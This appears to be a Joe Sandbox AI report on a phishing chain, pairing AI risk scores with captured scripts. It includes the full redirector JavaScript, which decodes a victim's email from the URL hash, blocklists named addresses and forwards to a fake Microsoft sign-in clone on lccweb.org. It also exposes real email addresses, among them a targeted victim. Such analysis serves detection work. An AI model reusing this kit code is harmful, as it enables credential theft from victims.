| URL: https://cc.naver.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://cc.naver.com |
| URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The script demonstrates several high-risk behaviors, including obfuscated code, data exfiltration, and redirects to potentially malicious domains. While the script appears to have some legitimate functionality, such as email validation and blocking, the overall risk is elevated due to the suspicious redirection and the use of encoded strings."
} |
const replacements = {
"q07": "@",
"jx3": ".",
"z9B": "c",
"R15": "o",
"Lh6": "e",
"WPy": "m",
"vk8": "t",
"g4P": "i"
};
const blockedEmails = [
"mario@bancogroup.com.au",
"lhorne@aqualogic.com.au",
"vincenzo.zinni@fusinaproducts.com",
"raz.kc@telrad.com",
"razk@telrad.com",
"keith.isaac@seruminstitute.com",
"ulf.heitmueller@vng.de",
"gilles.feith@luxairgroup.lu"
];
function decryptEmail(encryptedEmail) {
return Object.entries(replacements).reduce(
(decrypted, [key, value]) => decrypted.split(key).join(value),
encryptedEmail
);
}
function isEmailBlocked(email) {
const lowerEmail = email.toLowerCase(); // Ensure case insensitivity
return blockedEmails.includes(lowerEmail);
}
function isValidEmailMatch(email) {
let replacementMatches = 0;
let totalReplacements = Object.keys(replacements).length;
// Count how many of the replacements match the email after decryption
Object.keys(replacements).forEach(key => {
if (email.includes(replacements[key])) {
replacementMatches++;
}
});
// If at least 50% of the replacements are matched, return true
const matchPercentage = (replacementMatches / totalReplacements) * 100;
return matchPercentage >= 50;
}
async function redirectToDomain() {
const hash = window.location.hash.substring(1); // Extract hash without '#'
const encodedEmail = decodeURIComponent(hash); // Decode the email from the hash
if (!encodedEmail) {
console.error("No email found in the URL hash.");
window.location.href = "https://www.404errorpages.com/error";
return;
}
const decryptedEmail = decryptEmail(encodedEmail);
// Check if the email is blocked or doesn't meet the 50% match criteria
if (isEmailBlocked(decryptedEmail) || !isValidEmailMatch(decryptedEmail)) {
console.warn(`Blocked or invalid email detected: ${decryptedEmail}`);
window.location.href = "https://www.404errorpages.com/error";
return;
}
// Proceed to redirection
console.log("Email is valid, proceeding with redirection.");
sessionStorage.setItem('email', decryptedEmail);
const randomToken = Math.random().toString(36).substring(2, 15);
const timestamp = Date.now();
const uuid = crypto.randomUUID();
// Create query parameters and ensure proper email formatting
const queryParams = new URLSearchParams({
sessionID: randomToken,
timestamp,
uuid,
username: decryptedEmail // Use plain email, not encoded
}).toString();
// Redirect after progress bar completes
setTimeout(() => {
window.location.href = `https://accounts.lccweb.org/?${queryParams}`;
}, 1500); // Matches the animation duration (5 seconds)
}
document.addEventListener('DOMContentLoaded', redirectToDomain);
|
| URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy Model: Joe Sandbox AI | {
"brands": [
"Docusign"
]
} |
|
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "This JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses dynamic code execution through the `Function` constructor, which can be a high-risk indicator. Additionally, it sends data to external domains, which could potentially lead to data exfiltration. While the intent of the script is not entirely clear, the combination of these behaviors warrants further investigation and a medium-risk score."
} |
!function(){"use strict";var t=function(r,e){return t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,r){t.__proto__=r}||function(t,r){for(var e in r)Object.prototype.hasOwnProperty.call(r,e)&&(t[e]=r[e])},t(r,e)};function r(r,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function n(){this.constructor=r}t(r,e),r.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}function e(t,r,e,n){return new(e||(e=Promise))((function(o,i){function u(t){try{s(n.next(t))}catch(t){i(t)}}function c(t){try{s(n.throw(t))}catch(t){i(t)}}function s(t){var r;t.done?o(t.value):(r=t.value,r instanceof e?r:new e((function(t){t(r)}))).then(u,c)}s((n=n.apply(t,r||[])).next())}))}function n(t,r){var e,n,o,i,u={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:c(0),throw:c(1),return:c(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function c(c){return function(s){return function(c){if(e)throw new TypeError("Generator is already executing.");for(;i&&(i=0,c[0]&&(u=0)),u;)try{if(e=1,n&&(o=2&c[0]?n.return:c[0]?n.throw||((o=n.return)&&o.call(n),0):n.next)&&!(o=o.call(n,c[1])).done)return o;switch(n=0,o&&(c=[2&c[0],o.value]),c[0]){case 0:case 1:o=c;break;case 4:return u.label++,{value:c[1],done:!1};case 5:u.label++,n=c[1],c=[0];continue;case 7:c=u.ops.pop(),u.trys.pop();continue;default:if(!(o=u.trys,(o=o.length>0&&o[o.length-1])||6!==c[0]&&2!==c[0])){u=0;continue}if(3===c[0]&&(!o||c[1]>o[0]&&c[1]<o[3])){u.label=c[1];break}if(6===c[0]&&u.label<o[1]){u.label=o[1],o=c;break}if(o&&u.label<o[2]){u.label=o[2],u.ops.push(c);break}o[2]&&u.ops.pop(),u.trys.pop();continue}c=r.call(t,u)}catch(t){c=[6,t],n=0}finally{e=o=0}if(5&c[0])throw c[1];return{value:c[0]?c[1]:void 0,done:!0}}([c,s])}}}Object.create;function o(t){var r="function"==typeof Symbol&&Symbol.iterator,e=r&&t[r],n=0;if(e)return e.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&n>=t.length&&(t=void 0),{value:t&&t[n++],done:!t}}};throw new TypeError(r?"Object is not iterable.":"Symbol.iterator is not defined.")}function i(t,r){var e="function"==typeof Symbol&&t[Symbol.iterator];if(!e)return t;var n,o,i=e.call(t),u=[];try{for(;(void 0===r||r-- >0)&&!(n=i.next()).done;)u.push(n.value)}catch(t){o={error:t}}finally{try{n&&!n.done&&(e=i.return)&&e.call(i)}finally{if(o)throw o.error}}return u}function u(t,r,e){if(e||2===arguments.length)for(var n,o=0,i=r.length;o<i;o++)!n&&o in r||(n||(n=Array.prototype.slice.call(r,0,o)),n[o]=r[o]);return t.concat(n||Array.prototype.slice.call(r))}function c(t){return this instanceof c?(this.v=t,this):new c(t)}function s(t,r,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,o=e.apply(t,r||[]),i=[];return n={},u("next"),u("throw"),u("return",(function(t){return function(r){return Promise.resolve(r).then(t,l)}})),n[Symbol.asyncIterator]=function(){return this},n;function u(t,r){o[t]&&(n[t]=function(r){return new Promise((function(e,n){i.push([t,r,e,n])>1||s(t,r)}))},r&&(n[t]=r(n[t])))}function s(t,r){try{(e=o[t](r)).value instanceof c?Promise.resolve(e.value.v).then(a,l):f(i[0][2],e)}catch(t){f(i[0][3],t)}var e}function a(t){s("next",t)}function l(t){s("throw",t)}function f(t,r){t(r),i.shift(),i.length&&s(i[0][0],i[0][1])}}function a(t){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var r,e=t[Symbol.asyncIterator];return e?e.call(t):(t=o(t),r={},n("next"),n("throw"),n("return"),r[Symbol.asyncIterator]=function(){return this},r);function n(e){r[e]=t[e]&&function(r){return new Promise((function(n,o){(function(t,r,e,n){Promise.resolve(n).then((function(r){t({value:r,done:e})}),r)})(n,o,(r=t[e](r)).done,r.value)}))}}}Object.create;"function"==typeof SuppressedError&&SuppressedError;function l(t){return"function"==typeof t}var f,h=((f=function(t){return function(r){t(this),this.message=r?r.length+" errors oc |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to third-party domains, the use of fallback domains, and aggressive DOM manipulation. While the script appears to have a legitimate purpose related to authentication and user management, the lack of transparency around the data being sent and the use of multiple domains, some of which may be untrusted, warrant further investigation. Overall, this script requires closer review to determine the extent of potential risks."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://l1ve.lccweb.org/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2faccounts.lccweb.org%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASWHnrNXbxc0WNb4JK7dgtvf5rFyBmfk1kGVrmKUZmwcfoXGBlfMDJOYpIoLkktS83Ty0kty8xzKCzNzClJLQKpuMUk6F-U7pkSXuyWmpJalFiSmZ_3iBmn8gssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbrV-x3LhGXu7h6zTGROP4lYwXCKVT8ytTi0zDev0NM1yzLbpDI7yKzIz9LENaoiK9Aj0sgpIr0y19082cQvyTnS1tLKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EH38vdS3e_fHH8nccrfp2wkMpUfS8zs9JyA7dkfe3MqsLksAi3rPREfxfnjNSS5JQC14hs3zSDfJ9k2w0CDA8EGAA1\u0026login_hint=steven.levin%40quilter.com\u0026estsfed=1\u0026uaid=0bebc2a5a7734821b651a4dd3ea1dbf2\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026fci=https%3a%2f%2fdc8c7f96-3f043121.lccweb.org","urlMsaLogout":"https://l1ve.lccweb.org/logout.srf?iframed_by=https%3a%2f%2faccounts.lccweb.org","urlOtherIdpForget":"https://l1ve.lccweb.org/forgetme.srf?iframed_by=https%3a%2f%2faccounts.lccweb.org","showCantAccessAccountLink":true,"urlGitHubFed":"https://l1ve.lccweb.org/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2faccounts.lccweb.org%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASWHnrNXbxc0WNb4JK7dgtvf5rFyBmfk1kGVrmKUZmwcfoXGBlfMDJOYpIoLkktS83Ty0kty8xzKCzNzClJLQKpuMUk6F-U7pkSXuyWmpJalFiSmZ_3iBmn8gssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbrV-x3LhGXu7h6zTGROP4lYwXCKVT8ytTi0zDev0NM1yzLbpDI7yKzIz9LENaoiK9Aj0sgpIr0y19082cQvyTnS1tLKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EH38vdS3e_fHH8nccrfp2wkMpUfS8zs9JyA7dkfe3MqsLksAi3rPREfxfnjNSS5JQC14hs3zSDfJ9k2w0CDA8EGAA1\u0026login_hint=steven.levin%40quilter.com\u0026estsfed=1\u0026uaid=0bebc2a5a7734821b651a4dd3ea1dbf2\u0026fci=https%3a%2f%2fdc8c7f96-3f043121.lccweb.org\u0026idp_hint=github.lccweb.org","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guad |
| URL: https://7981e0f9-3f043121.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. However, it also includes some behaviors that warrant further review, such as the use of dynamic code execution (via `setTimeout`) and potential data exfiltration (sending data to external domains). Additionally, the script is obfuscated, which increases the risk. Overall, the script exhibits a mix of low-risk and moderate-risk indicators, resulting in a medium risk score."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t, |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a part of a web page loading and debugging utility. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily focused on handling document ready and load events, as well as providing a simple logging mechanism through the `$Debug` object. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script seems to be a benign utility with no clear signs of malicious intent."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector(" |
| URL: https://accounts.lccweb.org Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://accounts.lccweb.org |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it includes some legitimate functionality like analytics and configuration settings, there are also indicators of potential data exfiltration and the use of obfuscated URLs. The overall behavior is not clearly malicious, but the script requires closer inspection to ensure there are no hidden risks."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://7981e0f9-3f043121.lccweb.org/shared/1.0/","urlDefaultFavicon":"https://7981e0f9-3f043121.lccweb.org/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?sessionID=09hwlaox0a5x\u0026timestamp=1734514206388\u0026uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea\u0026username=steven.levin%40quilter.com\u0026client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://accounts.lccweb.org/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://9e1641f2-3f043121.lccweb.org/{0}/winauth/sso?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b","iwaSsoProbeUrlFormat":"https://9e1641f2-3f043121.lccweb.org/{0}/winauth/ssoprobe?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b","iwaIFrameUrlFormat":"https://9e1641f2-3f043121.lccweb.org/{0}/winauth/iframe?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://9e1641f2-3f043121.lccweb.org/common/winauth/sso/edgeredirect?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe3c3jGlLt8REDH67TwrGDdUTOsN9O_vYK4x5enzRAaUJGjfer370-REyL-zwkOnGIOurv5S4Cf6iED50QgomCp_WKo7Jjz0_QmP5mS_HBKpeoOyskE7V0RdgmMGmMNdeT4n8SFuNGyq96pp7nSyk6ID7STXTxmDt0-Kju8jGWMytIc8bW27eNQXRwDPkit564T3ra9j6iJmLH0I31lF_50SAA","canary":"YesUvMnqIEj9k4ykR6rN94EZxjQHY2BXgymG7c4NbCY=9:1:CANARY:lUDMx21d/qjOQcKeA7K/jYyWJ8Sd5Lmg21OEgCcUtjw=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"fce047cb-be44-4baf-b341-dd18251b7c6b","sessionId":"f7ff96ad-cf4e-429c-a41b-c460f4393700","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://accounts.lccweb.org/common/instrumentation/reportpageload","dssostatus":"https://accounts.lccweb.org/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://7981e0f9-3f043121.lccweb.org/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js","sbundle":"https://7981e0f9-3f043121.lccweb.org/ests/2.1/content/cdnbundles/watsonsupportwithjquery.3.5.min_dc940oomzau4rsu8qesnvg2.js","fbundle":"https://7981e0f9-3f043121.lccweb.org/ests/2.1/content/cdnbu |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | ```json
{
"risk_score": 2,
"reasoning": "The script contains legacy practices such as using outdated event handling methods like attachEvent and detachEvent, which are considered low-risk indicators. There is no evidence of dynamic code execution, data exfiltration, or interaction with suspicious domains. The script appears to be focused on logging and event handling, which aligns with typical analytics or telemetry functionality."
} |
//<![CDATA[
